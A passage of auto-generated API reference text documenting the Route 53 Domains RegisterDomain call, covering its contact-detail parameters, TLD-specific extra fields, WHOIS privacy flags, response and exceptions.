T'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
TechContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
PrivacyProtectAdminContact=True|False,
PrivacyProtectRegistrantContact=True|False,
PrivacyProtectTechContact=True|False
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe domain name that you want to register. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\nInternationalized domain names are not supported for some top-level domains. To determine whether the TLD that you want to use supports internationalized domain names, see Domains that You Can Register with Amazon Route 53 . For more information, see Formatting Internationalized Domain Names .\n
:type IdnLangCode: string
:param IdnLangCode: Reserved for future use.
:type DurationInYears: integer
:param DurationInYears: [REQUIRED]\nThe number of years that you want to register the domain for. Domains are registered for a minimum of one year. The maximum period depends on the top-level domain. For the range of valid values for your domain, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nDefault: 1\n
:type AutoRenew: boolean
:param AutoRenew: Indicates whether the domain will be automatically renewed (true ) or not (false ). Autorenewal only takes effect after the account is charged.\nDefault: true\n
:type AdminContact: dict
:param AdminContact: [REQUIRED]\nProvides detailed contact information. For information about the values that you specify for each element, see ContactDetail .\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type RegistrantContact: dict
:param RegistrantContact: [REQUIRED]\nProvides detailed contact information. For information about the values that you specify for each element, see ContactDetail .\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type TechContact: dict
:param TechContact: [REQUIRED]\nProvides detailed contact information. For information about the values that you specify for each element, see ContactDetail .\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type PrivacyProtectAdminContact: boolean
:param PrivacyProtectAdminContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.\nDefault: true\n
:type PrivacyProtectRegistrantContact: boolean
:param PrivacyProtectRegistrantContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (the domain owner).\nDefault: true\n
:type PrivacyProtectTechContact: boolean
:param PrivacyProtectTechContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.\nDefault: true\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The RegisterDomain response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.DomainLimitExceeded
